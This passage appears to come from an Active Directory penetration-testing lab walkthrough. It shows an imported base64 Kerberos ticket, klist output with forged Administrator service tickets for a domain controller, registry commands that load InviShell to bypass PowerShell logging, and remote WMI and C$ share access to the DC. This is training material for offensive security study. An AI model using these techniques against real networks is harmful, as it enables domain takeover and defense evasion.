      AekrRiXRowJBFFai1yDbDofE/lnH7/xS2s6vHEzlQXtayB3g7nzSipTsJDAjaWUNuOuuLUf2QJuVNj2+
      Ith63aL6as8hwvYAorIGXS/U2ik2JV9qubrnxk7eobqhrxJPuJz/1Nk7ctUUIErsVmpPAG9C1yIsyCEl
      c3qL8TdixPDww4AQA05SCyeYG3CjggEoMIIBJKADAgEAooIBGwSCARd9ggETMIIBD6CCAQswggEHMIIB
      A6AbMBmgAwIBF6ESBBDyVGf81aTnnZ3Nw3uqXTIYoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FM
      ohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKAAAKQRGA8yMDI1MTAyMzEyNTg0MlqlERgP
      MjAyNTEwMjMxMjU4NDJaphEYDzIwMjUxMDIzMjI1ODQyWqcRGA8yMDI1MTAzMDEyNTg0MlqoHBsaRE9M
      TEFSQ09SUC5NT05FWUNPUlAuTE9DQUypNzA1oAMCAQKhLjAsGwVycGNzcxsjZGNvcnAtZGMuZG9sbGFy
      Y29ycC5tb25leWNvcnAubG9jYWw=


[+] Ticket successfully imported!


c:\Users\student98>klist

Current LogonId is 0:0x14e3f3c4

Cached Tickets: (2)

#0>     Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: rpcss/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 10/23/2025 5:58:42 (local)
        End Time:   10/23/2025 15:58:42 (local)
        Renew Time: 10/30/2025 5:58:42 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

#1>     Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: host/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 10/23/2025 5:58:07 (local)
        End Time:   10/23/2025 15:58:07 (local)
        Renew Time: 10/30/2025 5:58:07 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

c:\Users\student98>

.

let’s try to use WMI commands on the domain controller:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc

c:\Users\student98>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
c:\Users\student98>set COR_ENABLE_PROFILING=1
c:\Users\student98>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}
c:\Users\student98>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
The operation completed successfully.
c:\Users\student98>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
The operation completed successfully.
c:\Users\student98>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.
c:\Users\student98>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\student98> Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc

SystemDirectory : C:\Windows\system32
Organization    :
BuildNumber     : 20348
RegisteredUser  : Windows User
SerialNumber    : 00454-30000-00000-AA745
Version         : 10.0.20348

PS C:\Users\student98>

c:\Users\student98>klist

Current LogonId is 0:0x15a4ce2a

Cached Tickets: (1)

#0>     Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: cifs/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 10/24/2025 2:53:53 (local)
        End Time:   10/24/2025 12:53:53 (local)
        Renew Time: 10/31/2025 2:53:53 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:


c:\Users\student98>dir \\dcorp-dc.dollarcorp.moneycorp.local\c$
 Volume in drive \\dcorp-dc.dollarcorp.moneycorp.local\c$ has no label.
 Volume Serial Number is 1A5A-FDE2

 Directory of \\dcorp-dc.dollarcorp.moneycorp.local\c$

01/16/2025  09:48 AM    <DIR>          Azure ATP Sensor Setup
11/17/2024  01:19 AM            36,392 Microsoft.Tri.Sensor.Deployment.Deployer.exe
05/08/2021  01:20 AM    <DIR>          PerfLogs
01/16/2025  09:49 AM    <DIR>          Program Files
05/08/2021  02:40 AM    <DIR>          Program Files (x86)
04/01/2025  08:44 AM    <DIR>          Users
01/06/2025  12:40 AM    <DIR>          Windows
               1 File(s)         36,392 bytes
               6 Dir(s)   9,498,357,760 bytes free

c:\Users\student98>

As we can see in the previous task the XXXX service can be used for winrs or PowerShell Remoting.